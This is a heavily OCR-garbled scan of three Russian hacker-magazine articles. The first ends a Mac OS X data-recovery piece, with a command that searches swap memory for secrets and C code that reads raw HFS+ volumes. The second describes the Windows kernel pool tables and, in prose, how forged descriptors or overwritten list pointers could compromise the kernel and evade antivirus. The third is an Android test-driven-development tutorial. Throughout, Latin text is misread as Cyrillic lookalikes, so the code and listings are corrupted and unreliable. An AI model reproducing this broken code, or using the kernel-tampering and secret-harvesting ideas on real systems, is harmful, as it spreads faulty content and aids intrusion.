$ 1$ -а1 /маг/ут 

Согат 131972 

Агихг-хг-х 4 гоо*ф мпее]1 136 Ос* 14 10:50. 

Агихг-хг-х 24 гоо{т мПее]1 816 Ос{ 14 10:52... 
агих--х--х 18 гоо* мпее]1 612 Ост 11 11:20 арр_ргой1е 
-ги------ Т 1 гоо* мпее1 67108864 Ос 14 10:50 змарЯ1е 


И тогда, проанализировав своп: 


5и40 $&Г1п8$ -о /маг/мт/змарЯ1е | вгер 'зесгеф соде' -С 2 
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ты можешь найти фрагменты файла, которые еще остались висеть 
в буфере. 

Для доступа к служебным структурам файловой системы в своем 
коде ты можешь использовать файлы гам/-устройств. Как прави- 
ло, на /Чеу/гЧ!$КО$1 находится ЕЁ! раздел, а НЕ5+ раздел на /Чеу/ 
г9!5КО$2. Кроме того, в ВЁ5/5 {5 _оггпа{.В уже есть готовые описания 
структур данных НЕ$+, которые тебе могут пригодиться. 


#1трогЕ <В$/П+$_Фогта*.В> 
#1трогЕе <и*11.1> 


\0о14А аитр (ип$1епеа сваг * Би+, $12е_+ 1еп) 

{ 

Фог ($17е 11=0; 1< 1еп; ++1) 
ретпет(“92х ^, ШИ]: 

} 


1п% тма1п(1п{ агеРс, спаг *агв\у[ ]) 

{ 

// Открываем файл устройства 

// Можно для краткости использовать и деуорепт 
1пЕ +4 = ореп( "/деу/га1$К0$52", О_ВООМУ ); 


// Описание заголовка есть в В+$_Фогта*.П 

НЕЗР1Ти5\/о]1итеНеа4дег уо1ите_Пеааег; 

// Заголовок лежит по смещению 1024 

1п га = ргеаа(+а, &уо1ите_пеаадег, 
$12е0+(\мо1ите_Пеадег), 090х400); 


// Теперь у нас есть вся основная инфа 
// о томе 
рг1п+("%и\п", уо1ите_Пеадег.61оск$12е); 


Ацтр ( (спаг*) &уо1 ите_пеадег, $17ео+(уо1ите_пеадег)); 


// Не забываем закрывать устройство 
с1о5е(+а); 


} 


Запускать проги, которые взаимодействуют Е гам/-устройствами, 
нужно через 5и00, так как делать это может только админ и судоеры. 


Тте Масйте 


Начиная с Мас ОЗ Х [еорага, в состав системы входит те 
Масрте. Эта утилита создает резервные копии файлов, записывая 
все изменения, происходящие с файловой системой. Перечислен- 
ные действия позволяют пользователю восстановить всю систему, 
несколько файлов или один отдельный файл втом виде, в котором 
он находился в определенный момент времени. 

Для работы те Масйте необходимо выделить отдельный диск. 
Арр(е выпускает специальное устройство Арр(е те Сарзще, 
которое используется как сетевой диск специально для резервных 
копий Т!те Масйте. Гте Масйте может использоваться и слюбым 
ОЗВ или е5аа-диском. При первом запуске Гите Масрте создает 
папку на указанном резервном диске, содержащую все данные. 
Потом Гите Масрте бдует копировать только измененные файлы. В 
общем, если для диска используется те МасБте, то восстановле- 
ние утраченных данных не представляет особых проблем. 


Ошто 


Информация очень редко исчезает бесследно. Хорошо зная работу 
файловой системы, можно восстановить даже то, что считалось 
безвозвратно потерянным, ну и вообще — узнать много интересно- 
го изличной жизни пользователя. == 


> 105 


СООМС 


Александр Эккерт [$1апт1с.тап@дтаЦ.сот 


_ НА ПЕРЕХВАТ 


Бурим ядро с целью поиска новых 


способов перехвата 


© Как перехватить данные в \\пдо\м$? Ответ на этот вопрос, 
казалось бы, очевиден. Всякий человек, мало-мальски разбираю- 
щийся в вопросах кодинга систем безопасности, ответит — нужен 
перехват специфических функций. В частности, для работы 

с памятью. Это верно. Но сегодня мы постараемся поковырять эту 
тему чуть глубже, чем это принято в цивилизованном обществе. 


Так какие же еще способы можно предложить, кроме перехвата 
функций 7? Пожалуй, этот вопрос поставит в тупик две трети про- 
граммистов. Более-менее подкованные кодеры, почесав затылок, 
смогут вспомнить о таком неочевидном способе, как скан РОЕ/ 
РТЕ-таблиц интересующего нас процесса или, в случае проще, о 
простом сканировании адресного пространства процесса. На этом 
способе, кстати, основаны многие программы типа А{Мопеу и 
схожие с ней. 

Аеще способы есть? Датакие, чтобы не трогать напрямую адресное 
пространство процесса? Наверное, есть. Будем искать :). 


Организация памяти в МИп4о\м/$ 


Говорить я сегодня буду, как это часто со мной случается, о ядре. 
Вернее, об организации памяти в ядре и отом, как эту самую «орга- 
низацию» можно использовать в наших коварных планах. 
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И ежу, думаю, понятно, что ядро \п4ом/5 содержит несколько АР|- 
функций, предназначенных для выделения и освобождения памя- 
ти. Виртуальная память в \\!пдо\/5 организована в виде «блоков», 
которые называются «страницами». В архитектуре [п{е[х86, размер 
каждой страницы равен 4096 байтам. При этом функции, пред- 
назначенные для выделения/освобождения памяти в МИп9о\/$ 
(ЕхАЦоса{еРоо[М/ИВТад и ЕхРгееРос(М/НТад], могут «хранить» 
неиспользуемые никем блоки памяти для следующих выделений 
памяти. Внутренние функции напрямую взаимодействуют с желе- 
зом каждый раз, когда нужно выделить страницу. При этом все эти 
процедуры очень сложны и требуют крайне нежного обращения. 


Захватываем память в МЛпдо\м/$ 


Если ты хоть раз сталкивался с написанием драйверов под 
\МЛпдо\м/$, тебе должно быть знакомо разделение памяти на под- 
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Ка> !рсЕ 


Малое 1 М1пок 1 
МЕТЗЬ. Ехсере1оп11 $: 
МЕТЗЬ. сЕБасКкКВазе: 
НЕТЗЬ. сбаскЫттт: 
[...] 


[ Г ] 


+0»х000 Р 
+0=#004 Ц 


+Ох5аО РРНРадеГооКа=1е1 Е : 
0х819е6000 _СЕМЕВАЬ ГООКАЗТЬЕ 
0х8054аа090 _СЕМЕКБАЬ БООКАЗТЬОЕ 


КРСЕК Ёок Ркосеззок О аб ЕЕаЗЕЕООО: 


80548660 
80548еЕ о 
80546100 


5е1ЕРск: ЕЕЧЕЕООО 
Рееь: ЕЕЧЕЕТ2О 
Теа1: 00000000 
ТЕК: 00000000 
ТОВ: ЕЕЕЕЕЕЕЕ 
1псекеирЕеМоае: 00000000 
ТОТ: 8003Е400 
СОТ: 8003Е000 


Ка> аЕ пЁ! КРЕСВ ЕЕАЕЕТ20 


[32] 


Рисунок 1. МЛпОВС показывает внутренности РСКВ 


качиваемую (радед] и неподкачиваемую (попрадеч). 
Разница между ними вполне ясна — если ядро выде- 
ляет память в подкачиваемой памяти, то со временем, 
чтобы не захламлять оперативную память компьютера, 
она просто сбрасывается на жесткий диск и существует 
там в виде файла раде! {е.эу$. В нем, как правило, хра- 
нятся радед-секции драйверов и куча прочей шняги. 
Мопрадед-память на диск никогда не сбрасывается и 
постоянно держится в оперативной памяти. Поэтому 
при ее выделении нужно быть крайне экономным и 

не использовать ее без особой нужды. К примеру, в 
попрадечд пуле хранятся ключевые секции драйверов и 
самого ядра. Не буду долго расписывать все прелести 
использования подкачиваемой и неподкачиваемой 
памяти, материала эту тему полно в Сети. Да итвой 
любимый журнал [ не раз писал об организации памяти 
в \\Лпдом/5. Добавлю лишь, что обработка подкачивае- 
мой и неподкачиваемой памяти ядром принципиально 
отличается одна от другой. 

Запрос блоков памяти у железа требует времени, и 
\МЛпао\м/5 старается балансировать между скоростью и 
необходимостью избегать траты оперативной памяти, 
которой всегда мало. Механизм выделения памяти 
обязан выдавать запрошенные куски памяти нужного 
объема как можно быстрее. При этом время отклика на 
запрос выделения памяти проходит быстрее, если эти 
куски памяти находятся в соседствующих аллокациях. 
Поэтому для удобства и для обеспечения быстродей- 
ствия при выделении памяти в ядре существуюттри 
различные таблицы, которые отличаются между собой 
лишьтем, блоки памяти какого размера они описывают. 
Другими словами, при манипулировании памятью 
ядро смотрит на эти таблицы, из которых получаети 
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записывает необходимую информацию о том, сколько 
памяти выделено, какого размера и где блоки памяти 
находятся. 

Каждая таблица реализует свои способы хранения 
информации о выделенных блоках памяти. 

Рассмотрим каждую таблицу отдельно. 

Первая таблица, РРМРадеч оока>!Че[1${ — это ас- 
социативная таблица (Гооказ!4е1!5, существующая 
отдельно для каждого процессора и описывающая 
выделенные куски попрадед-памяти размером <= 256 
байт. Каждый процессор обладаеттак называемым РСК 
— «регистром контроля процессора» [ргосеззог соп(го! 
гед! {ег}, который хранит информацию отаких вещах, 
как уровень [КОГ, СОТ, 1ОТит.д. Расширение этого ре- 
гистра, названное РСКВ — «регион контроля процессо- 
ра» (ргосеззог сог(го[ гед!оп}, хранит в себе указатель 
на эту очень любопытную таблицу [см. рис. 1). 

В МИпдом/5 5етегкКа внутренняя структура КРКСВ не- 
много изменилась, но, думаю, общая концепция понят- 
на — КРКСВ содержит в себе данные об использовании 
текущим процессором выделенной памяти: 


Туреде+ $+гис* _КРВСВ { 


/*9@х5А@*/ $ЕгисЕ 
_РР_1ООКА$ТОЕ_1Т$Т РРЕооКа$14е11$+[16]; 

/*0х620*/ $ЕгисЕ _СбЕМЕКАЁ Г ООКАЗТОЕ _РООЁ 
РРМРаве4  оокКа$14е1$1{[32]; 

/*@хЕ20*/ $+гисЕ _СбЕМЕКАЁ __ГООКАЗТОЕ _РООЁ 
РРРагеа ооКка$14е11$*[32]; 


} КРВСВ, *РКРЕСВ; 


(НТТР.И/ЛИ МАИ 


р ИпК5 
Баскпебох.ога 


— на этом сайте ты 
сможешь найти много 
всяких вкусностей на 
тему программирова- 
ния и безопасности. 
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НиНопРаде РОО Реее 12 Неа [1] 


Ро1зопе ету 


ФооЕТуре: ЮопРьуе 


Р]лох т ФРС ФВРЕ 


Раке епегу (ОхУУххЬОЕР) 


РА 1 


Вох : Роивопея 


(--. 


Е а 1 кие [ОхВОГТУГИГ], бкГУХХЕРЕ 
Мы Орсойе аетг чак т Зо [тес] ТР 60 2) 


Рисунок 2. Отлинковка описателей блоков памяти в 
МптМопРадедРооЕгееЦ$Неаад 


По сравнению с простыми двусторонними таблицами, такие 
ассоциативные таблицы позволяют процессору быстрее выделять 
память. 

Для работы с этими таблицами используют внутреннюю функцию 
Ех|п{егоске9РорЕги(гу $4. 

Вторая таблица зависит оттого, сколько процессоров использует- 
ся, и как система управляет ими. 

Система выделения памяти использует эту таблицу, если размер 
выделяемой памяти <= 4080 байт. Или же в том случае, если ассо- 
циативный поиск заканчивается ничем. Описатель такой таблицы 
имеет такую же структуру, каки РООГ_ОЕЗСЕЁРТОК: 


фуреде{ $%гис* _РООЕ_БЕ$ЗСКТРТОК 
{ 

епит _РООЕ_ТУРЕ Роо]1Туре; 

иптоп { 

$Егисе _КСУАВОЕО_МОТЕХ Разед!оск; 
(тО№ 32 МопРавеа!оск; 

}; 

[0№32 Кипп1пА110с$5; 

ЕО0№32 Випп1п50еА11ос$; 

[О№632 Тофа1В15Радез; 

[0№632 ТИгеаа$Ргосе$$1п=0ефегга15 ; 

(тО№@32 Тофта1Вутез; 

ОТМТ8 _РАБОТМбО_[9х2С]; 

(и10№@32 Роо1Тпаех; 

ОИТМТ8 _РАБОТМ61_[0хзС]; 

[О№632 Тофа1Радез; 

ОИТМТ8 _РАБОТМ62_[9хзС]; 

\отО** Репа1пёЕгеез ; 

[О№@32 Репа1п=Егеедер*И; 

ОТМТ8 _РАООТМбЗ_[0х38]; 

$Егисе _ЁЕ1$Т_ЕМТВУ 11$%Неаа$ [ 512]; 
} РОО БЕЗСВТРТОК, *РРООЕ_ОЕЗСВТРТОК; 


Если на машине имеется лишь один процессор, то для по- 
лучения переменной Роо[\Мес{ог используется указатель на 
МопРадеаРоо[езсгиртог. 
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Если же процессоров много, то используется таблица 
ЕхрМопРадедРооезсгир{ог, которая содержит 16 слотов, занятых 
под описатели пула. 

При этом структура РКСВ каждого процессора указывает на струк- 
туру КМОПЕ, которая может быть слинкована между несколькими 
процессорами и может содержать несколько полей, используемых 
таблицей ЕхрМопРадеч9Рооезсгиртог. 

Третья и последняя таблица, нареченная 
МпМопРадеаРоо(Егее1${Неаа, используется всеми процессора- 
ми втом случае, если нужно выделить блоки памяти больше, чем 
4080 байт. Она также используется ядром, если у первых двух та- 
блиц свободных ресурсов не осталось совсем. Эта таблица состоит 
из четырех списков [15 Т_ЕМТКУ, каждый из которых представляет 
собой номер страницы, за исключением самого последнего спи- 
ска, в котором хранится список [извини за тавтологию] страниц, 
занятых системой. 

Доступ к этой таблице защищен спинлоком, который вызывается 
внутренней функцией ядра ГоскЧиенцеМопРадедяРоооск. 

Во время процедуры освобождения мелких блоков и очист- 

ки памяти функция ЕхЕгееРоо ИВ Тад «склеивает» между 

собой такие блоки, после чего они попадают в таблицу 
МтМопРадеаРоо[Егее|1${Неад уже в увеличенном размере. 

Уфф, пожалуй, я увлекся. Понимаю, что все вышеописанное сразу 
понять трудно, но запасись терпением — и все встанет на свои 
места :]. Так или иначе, думаю, пора двигаться к завершению. 


И напоследок... 


Итак, подведем итоги вышесказанного. Механизм выделения и 
освобождения памяти, по сути своей, зиждется натрех таблицах 
ядра, которые во многом похожи между собой. При этом самое 
примечательное то, что описание выделенных блоков памяти в 
этих таблицах основано на широко известных ассоциативных или 
просто двусвязных списках. Найти эти таблицы в ядре не пред- 
ставляет особого труда. Правда, для этого нужно засандалить 
драйвер, что в \//пдо\/5 М!${а/7 сделать проблематично. Но речь 
сейчас не об этом. 

Только задумайся: ведь ничего не стоит злоумышленнику вы- 
делить память, после чего вставить в таблицу свой описатель 
памяти, который будет обрабатываться ничего не подозревающим 
процессором как абсолютно законный! 

Примерно воттаким образом (см. рис. 2]. Помимо этого естьеще 
много способов поиздеваться над организацией памяти (таблица- 
ми] в МЛпдо\м/5. Например, перезаписать указатель Мех{ в ассоциа- 
тивной таблице [ооказ!4е, вызвать Роо(ОуегЦо\м/ путем переза- 
писи указателей в простых [односторонних] списках РепатаЕгеез 
(они находятся в хидере пула] ит.д. 

Вариантов много, и все они достаточно сложны для реализации. 
Однако при должных усилиях, прямых руках и умении копаться в 
отладчике — вырисовывается очень даже неплохая перспектива. 
Мне, правда, неизвестны факты использования описанной техни- 
ки в дикой природе, однако... кто знает, кто знает... 


Заключение 


Описанная в статье техника сводится ктой удивительной катего- 
рии, когда для того, чтобы поставить систему на колени, достаточно 
лишь переписать пару байт в памяти, при этом не используя какие- 
либо хуки. 

Используя эту технику, ты сможешь обойти самые неглупые ме- 
ханизмы обеспечения защиты операционной системы — такие, 
как сравнение кода или хэширование. Не хочу утверждать, что эта 
техника эксплуатации памяти в \\/\п9о\м/$ всесторонне прекрасна 

и замечательна, однако при правильном и грамотном «употребле- 
нии» она способна вогнать в уныние разработчиков антивирусных 
и проактивных систем защиты. 

Удачного компилирования и да пребудет стобой Сила! == 
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СОРМС 


Артем «РапкоВ» Смирнов [гапКог77 7 адтай.сот, ах-КНо${.ги) 


——==ч н т р ти 


ь. 


рограммерские 
типсы И триксы, 


спецвыпуск; ГОО иАпаго4 


Е При разработке любого относительно сложного программного комплекса (особенно при разра- 
ботке систем, выполняющих сложные расчеты) программист большую часть времени тратит не на 
написание программного кода, а на его отладку. О том, как потратить это время с пользой мы 


сегодня тебе расскажем. 


В отладке программного обеспечения действуеттак называемый 
принцип Парето — в данном случае он может быть сформулирован как 
«На отладку 20%-ного кодауходит 80% общего времени отладки». По- 
пробуем разобраться, почемутак происходит. Предположим, существует 
программа, выполняющая некоторые расчеты, алгоритм работы которой 
выглядит примерно как изображено на «Схеме 1». Также предположим, 
что в изначальной версии программы третий метод не был реализован 
(и, соответственно, не былучтен при проектировании архитектуры ПО). 
Однако в следующей версии программы понадобилосьего добавить. 
Каквидно из блок-схемы (см. «Схему 1»], третий метод оченьтрудно 
отлаживается, и в случае, если программист допустит ошибку, найти ее 
при отладке будет очень сложно, так как из-за условного оператора этот 
метод будет вызываться крайне редко. Одним из выходов можетбыть 
написание небольшой отдельной программы длятестирования этого 
метода. Однако он не профессионален и зачастую слишком сложен —к 
примеру, если этот метод зависитот других классов. Для того чтобы из- 
бежать таких проблем, следует использовать модульноетестирование. 
Модульное тестирование (англ. ип {езНпа] — один из методовтестиро- 
вания программного обеспечения, при котором пишется отдельный на- 
бор тестов для каждого класса, состоящий изтестов для каждого метода, 
объявленного втестируемом классе. Подобнаятехника заменяет боль- 
шую часть отладки и значительно упрощает разработку приложения как 
на конечных, так и на начальных стадиях, потомучто позволяет прове- 
рить все случаи поведения каждого методатестируемого класса, что за- 
частую не представляется возможным при «ручной» отладке. К примеру, 
если требуется перебрать все значенияу аргумента функциитипа!п{32, 
— умодульного теста это займет несколько минут, атестировщикврядли 
вообще сможет справиться с этим заданием. Дляеще большегоупроще- 
ния и ускорения разработки рекомендуется использовать методологию 
разработки, называемую «Разработка черезтестирование». Разработка 
черезтестирование, или ТОО (англ. Тез{ Онуеп Оеуеюртепф, — один из 
видов экстремального программирования. Если в классических методах 
разработки сначала пишется программный код, а потом (приусловии 
использования модульныхтестов] — тесты, то в ТОО сначала пишутся 
модульныетесты, и только потом тестируемые классы и методы реализу- 
ются в программном коде. Графическое изображение ТОО можноувидеть 
на«Схеме 2». Несмотря нато, что этот метод относится к экстремальному 
программированию, и, на первый взгляд, кажется абсурдным, он все 
чаще используется при разработке крупных программных продуктов. 


Требования, предъявляемые 

к прог аммному коду при разра- 
отке через тестирование 

ы Код должен быть разделен на как можно более мелкие части 

® Должен выполняться принцип «один тест — одно действие», то есть 
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мМетбА 1 | 


Схема 1. Алгоритм работы программы 


один{ез{ сазе не должен проверять правильность выполнения более чем 
одного действия. Инициализация объектов должна производиться вне 
тестов. 

® Желательно выполнение принципа «одинтест — один метод», то есть 
{е5{ сазе должен содержать 1-2 строки кода. 

® Должны быть соблюдены уровни абстракции классов программы, то 
есть логика программы не должна быть привязана кинтерфейсу про- 
граммы. 


оста раороботки 


* Отделение логики программного продукта отинтерфейса пользователя 
ыы Как следствие изпредыдущего пункта — упрощение процедуры по- 
вторного использования кода в других программных продуктах 

ы Упрощение отладки, поддержки и доработки программного кода за счет 
разделения его на небольшие части 

® Меньшая вероятность неожиданного поведения программы 


ХАКЕР 07 /150/ 2011 


Схема 2. ТОО как она есть 
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'МанхеЕхатр!е 


Е и — 5 знай Е — Е 


Наша подопытная 


Роберт Мартин, известный специалиств области экстре- 
мального программирования, предлагает использовать 
следующий алгоритм ТОП: «Сначала нужно добиться, чтобы 
код хоть как-то работал, и только потом улучшать его». На 
практике эта рекомендация выглядит следующим образом: 
1. Написать модульныйтест для какого-либо метода (на 
данный моментеще не реализованного}. Вследствие того, 
что метод еще не реализован, тестовый проектдаже не 
скомпилируется. 

2.Написать «заглушку» для этого метода. К примеру, если 
метод должен возвращать переменную типа Бос{еап, то 
он должен содержать только строку вида «ге игп Та(зе» (в 
случае, если при правильном выполнении метода должен 
быть возвращен {гие}, то есть заглушка должна возвра- 
щатьтакое значение, чтобытест «не проходил». Теперь 
тестовый проекткомпилируется, нотест по понятной при- 
чине не выполняется. 

3. Реализовать метод алгоритмически правильно, но не 
пытаться улучшить его — требуется просто сделать «чтобы 
работал». Убедиться, что все тесты проходят. 
4.Усовершенствовать код — привести кнаиболее удобо- 
читаемому виду, разбить метод на более мелкие части. 
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(ее тесты 
м а > 


Убедиться, что все тесты проходят. 
5. Перейти к реализации следующего метода. 


Когдане рекомендуется 
использовать 
модульные тесты? 


В задачах, выполняющихся слишком долго. К примеру, 
метод, выполняющий запрос к БД, лучше исключить из 
спискатестируемых, потому что все тесты должны вы- 
полняться каждый раз при запуске тестирования, иесли 
тест выполняется долго — программист будет стремить- 
ся отключить его. Если нужно протестировать метод, 
разбирающий ответот БД, то лучше отделить этот метод 
непосредственно отзапроса, и передавать ему заранее 
подготовленные «фальшивые» данные. 


Какэто выглядит 
напрактике: 


В качестве примера мы напишем приложение (и модуль- 
ныетесты к нему] для ОС Апаго!а. Этот пример частично 
актуален не только для Апаго!а, но и для любой платфор- 
мы, поддерживающей /ауа. Тестовое приложение будет 
принимать от пользователя массив точек и принимать 
решение, расставлены ли они в правильном порядке, 
возвращая {гие или Та([5е. Логика расстановки проясня- 
ется, если представить, что на первой точке написано, 
кпримеру, «1», на второй — «2», натретьей — «3» ит.д. 
Точки могут располагаться в ряд, в столбик или в смешан- 
ном порядке. 

Для начала нужно создать проект для Апаго! (подразуме- 
вается, что утебя уже установлена среда разработки, кпри- 
меру, ЕсИрзе, атакже плагин АОТ и Апагоа 50К] итестовый 
проект. Для того чтобы создать тестовый проект, нужно в 
диалоге создания проекта нажать кнопку «Мех» и отметить 
чекбокс «Сгеае а{еЁ рго]ес{». 

Теперь можно приступить кнаписанию модульного теста. 
Втестировании /ауа-приложений стандартом де-факто 
считается /Цпк. У//пЁтакже включен в Апаго!9 $ОК, соот- 
ветственно, тестирование приложений на Апаго!а произво- 
дится именно при помощи этой библиотеки. 


Тестирование логики 


Сначала создается Тез Бике для проекта (его код модифи- 
цировать не нужно}, а потом — Тез{Сазе для каждого класса. 
Внашем случае класс всего один, ивнем содержится всего 
один открытый метод (статический). Напишем дватеста 


[2уо 


› ЧУЧ 
На диске ты найдешь 
весь исходный код 
(как самого проек- 
та, так и модульных 
тестов для него] 


ЕО 


р 1пРо 

В статье использо- 
вались материалы 
из УМЛК!редта и книги 
Р. Мартина «Чистый 
код» 
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7. 


ан 


ее | 


Ргонес пати МАтобинтури . Прошу обратить внимание, что каждый тест должен начинаться со слова 
СогеР {е5{, иначе он не будет распознан пк как... ну, вобщем, кактест :. 
©: Сова гам ребре 9 иерея Чтобы запустить выполнениетестов, нужно нажать <С\ {> + <Е11Т>. 
Стезте рестест Гпогт ежнАиеку: осмос Однакотесты даже не запустятся, потому что класс Ма{их не содержит 
Уре фен синт метода огаег!$Е 191 {). Теперь следует написать заглушку для этого 


зева РА Алана Бена метода, состоящую из однои строчки: «гетигпТа[5е». Тесты за пустятся, но 


их поведение будетнемного странным: первый тестне будет пройден, а 
Сама: рисресе Рпопл Фкнинину аппры . 

лох есь второй — будет. Сначала нужно добиться прохождения первоготеста, и 
БалурмыЕ ЛесемевеленыР И, только потом браться (если, конечно, потребуется] за второй. 


Реализуем метод огде$ Рав следующим образом: 


Выйа Таеиже 

Тагоее МУьлиие Мень Рыеит АР. риб11с {а{1с Боо1еап огаегТ$К1ей* ( 
Алёгое 1.5 АТОН Орел Зснисе Резныи 15 Г. бпа1 11$%<Ро1п®> рРо1п%5) { 
беса АРЫ бен и, 1.1 : Ро1п{ Яг$Ро1п* = рРо1п*$.ве{(9); 
Алтеа 1 В Альгой Сурат Зеленое Ртсдес 18 4 
о асеибо ме она к ы Фог (111 =1; 1 < рРо11{т$.$12е(); 1++) { 
и ИИ ИЕ ев Япа1 Ро1и{ зесопаРо1п* = рРо1п*$.ве*(1); 
Сосо ДАРЫ бесом ик. 2-ирЫ.. Т 
ее А Альагон Орал Зеничее Ресрыс 22 8 Е 
басу АРЫ безода ить. 22 Е 1+ (ро1п&5АгеТпмгопв0гаег (Аг Ро1п*, 
Раз бО 493-0п ОЕ 22 : зесопаРо1п*)) { 
СААЖУ ТЬЬ АЗ. Зытилини Емеля Со. 1ь, 23 8 гетигп Ра15е; 
Ал @гаай 2.3.1 дла гонЯ Срна З5бигое РгоуёЕ 2.34 Я } 
босые АРЫ. неее Ты. 2.3.1 
[я Зеету Еекоореня Кое С сеты... 2.3 г. Яг$ЕРо1пе = зесопаРо1п*; 

у Алая 233 дАьагоЯ Ораа Збикой Ргсьст 233 10 } 
Соне АРЬ нео ес, 2.34 19 
димста 30 АРА тон Орг Фоитсе Русло 35 | А 
Соса АРЫ Сено ъе. 30 и ? 


бавлаьей дРдесий риоя 21 -орёна , . . . 
Метод роп{Агеп\/гопдОгаег(} — закрытый статический, состоящий из 


Рисратены одной строки: 
Аррбе вет пет Мг Равгире 


Рскаоие гыетие Е гефигп (рЕ1г5ЕРо1пе.х >= р5есопаРо1т*.х); 
5. Сене АС КАРАСЬ, 


а РИ Нетрудно догадаться, что он возвращает (гие, если первая точка нахо- 
па $08 Мегркит = 


дится правее, чем вторая [либо перекрываетее). 

Запускаем тесты — они проходят. Отлично, на этомтестирование логики 
приложения можно считать законченным. Теперь можно приступитьк 
тестированию графического интерфейса. 


?) ых [ны а боя 
Создание проекта для Апаго4 Тест ирование СИ 


Графический интерфейс — крайне важная часть любого ПО. Если 


— первый будетпередавать заведомо верный списокточек, второй — пользователю не понравится СИ] — он, скорее всего, не будетис- 
заведомо неверный. пользовать программу, какая бы мощная «начинка» не содержалась 
внутри. Тестирование СЦ| должно быть не менее тщательным, чем 
руб11с \о1а %е$\а1140гаег() { тестирование логики программы, причем тестирование желатель- 
Е15<Ро1п®> ро1п*$ = пем АггауЕ1$1<Ро1п*>(); но максимально автоматизировать — только так можно покрыть 
ро1п{$ .аЯа(пем Ро1п*(@, 90)); наибольшее количество возможных вариантов действий пользо- 
ро1п{$ .аЧа(пем Ро1п*(1, 9)); вателя. Конечно же, программист может протестировать интерфейс 
ро1пф$ .а4а(пем Ро1п{(2, 0)); вручную, но здесь есть один нюанс. Дело втом, что программист 
ро1п{$ .аЧа(пем Ро1п*(3, 9)); тестирует приложение сточки зрения программиста, а не пользо- 
вателя, и ему, в отличие от пользователя, может просто не прийти в 
Боо1еап гези1* = Ма*г1х.огаегТ$В1еН{ (ро1п*$); голову, что можно ввести символьную строку в поле для ввода чисел. 
аззегТгие(гези1*); В Аподго!а $ОК есть инструментарий для тестирования графического 
} интерфейса, в который включен класс Асиуцуп${гитетайопТе${Са 
5е2. Его следует наследовать при написании модульных тестов для 
рчб11с уо1а %е${Тпуа1190гаег() { СУ. Стоит обратить внимание нато, что Аси\уКуп{гитептаНопТез{ 
Е1$<Ро1п®> ро1пе$ = пем АггауЕ1$<Ро1т>(); Сазе2? — это шаблонный класс, т.е. использовать его следует в виде 
ро1пе$ .а@а(пем Ро1п*(@, 0)); са55 МатАсиуцКуТе{ е{еп45 Аспупупгитет{анопТе${Сазе2<Ма! 
ро1пе$ .а@а(пем Ро1п*(3, 09)); пАсИмКу>. 
ро1пе$ .а94(пем Ро1п*(1, 0)); Наше приложение содержитодну Аси\пу ([МатАсйм\Ку), ее мы и будем 
ро1п{$ .аЧа(пем Ро1п*(2, 9)); тестировать. Как она выглядит, можно увидеть на рисунке на предыду- 
щей странице. 
Боо1еап гези1* = Мафг1х.огаегт$ Вене (ро1п*$); Я использую отладку на устройстве с Апагоа 2.3.4 через МИ -Е!. Кстати 
аззегЕРа1хе(гези1*); говоря, отладка по \\/\-Егочень удобна по сравнению с отладкой по 
} кабелю и, тем более, в эмуляторе. Для того чтобы отлаживать при- 
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Один из тестов не прошел 


ложения подобным образом, нужно установить виджет Ад оуег 
ММ -Етиз Апаго!а Магке{ [подходиттолько для телефонов с правами 
гоо{. После запуска нужно подключиться кустройству. Например, 
следующим образом: 


ааб соппес* 192.168.1.5:31337 


Тестирование СЛ выглядит приблизительнотак же, как итестирование 
логики приложения. Создается класс, в нем создается метод е /р(), в 
котором инициализируются объекты. Объекты, представляющие Асй\цу, 
поля для вводатекста и кнопку следует сделать закрытыми полями: 


рг1\уа*фе Ас%1\1Фу тАс&1уу; 
рг1уае Е41Техе тЕд1*Тех*1; 
рг1уае Ед41Техе тЕд1*Тех{2; 
рг1\уафе Ед1*ТехЕ мЕа1тТех*3З; 


Инициализируются они следующим образом: 


ргофесфеа уо1а зе*Ур() ЕПгом$ Ехсер*1оп { 
зирег. зе Ур(); 


мАСЕ1\1у = вефАсЕ1\у1ту(); 

тЕЧ1ТехЕ1 = (Е91ТехЕ )мАсЕ1\у1у .Нпа\1емВута 
(сот.ехатр1е.та{г1х.К.14а.еа1ТехЕ11пе1); 

к. > 

тТехЕ\/1ем = (ВиЕоп)мАсЕ1\у1у .Нпа\темВута ( 
сот.ехатр1е .тафг1х.К.1а.ехе\1ем); 


В первую очередь нужно проверить, создалисьли элементы интерфейса: 


риб11с уо1а Ее Сопего1$Сгеа*еа() { 
аз5егЕМо{Ми11 (мАсе1\у1у); 
аз5егЕМо{Ми11 (мЕЧ1Тех*1); 
а 
а$5егЕМ№о{Ми11 (тТех®\/1ем); 


Этоттест проходит без ошибок, но лучше перестраховаться и выполнять 
его всегда — он может не проходить, если, кпримеру, у какого-либо эле- 
мента неправильно задано какое-то свойство. 

В полях для ввода указываются координаты точки через пробел, ав 
{ех\Мем/и появляется результат (ОК или МОТ ОК). 
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Создание теста СЛ 
Напишем модульныйтестдля просчета: 


руб11с уо1а е$\а11АЪажа() { 

ТочисНИи115 .Фар\1ем(+и1$, тЕа1ТехЕ1); 

°зепаКеу$ (КеуЕ\уеп* .КЕУСОБЕ_@, КеуЕуеп* .КЕУСОБЕ_5РАСЕ, 
КеуЕуеп{ .КЕУСООЕ_0); 

ТочисНИи115 .Фар\/1ем(+и1$, тЕа1ТехЕ2); 

°сепаКеу$ (КеуЕмеп* .КЕУСООБЕ_1, КеуЕуеп{ . КЕУСОБЕ_5РАСЕ, 
КеуЕ\уеп{ .КЕУСОБЕ_0); 

ТочсНИи{115 .Фар\1ем(+и1$, тЕа1ТехЕЗ); 

сепаКеу$ (КеуЕмеп* .КЕУСОВЕ_2, КеуЕуеп{ .КЕУСОБЕ_5РАСЕ, 
КеуЕ\меп{ .КЕУСОБЕ_0); 

ТочсНИи115.ар\1ем(1и1$, тЕа1ТехЕ1); 

а55егЕЕдца1$ ( "ОК", мТехЕ\1ем. ве Тех*()); 


Онне проходит, потому что редактирование не обрабатывается. Напи- 
шем обработчик для события смены фокуса на ЕЧКТехГах — итестбудет 
пройден. Код обработчика приводиться не будетиз-за ограниченности 
объема статьи, ктому же, он абсолютно тривиален. Гакже необходи- 

мо проверить, правильно ли обрабатываются неверные данные - это 
задание останется натвоей совести, тем более, что оно практически 
аналогично предыдущемутесту:). 

При запуске тестов можно наблюдать, как сами нажимаются элементы 
интерфейса, переключаются Асймцу (для каждоготеста Асй\Ку запускает- 
ся заново) — забавное зрелише :). 


Мораль сей басни такова 


В данной статье были рассмотрены кактеоретическая, так и практи- 
ческая части разработки через тестирование. В качестве примера 
приведен код приложения на /ауа под ОС Апаго!а с использованием 
инструментария /]Упи, однако принципы тестирования приблизи- 
тельно одинаковы налюбой ОС. 

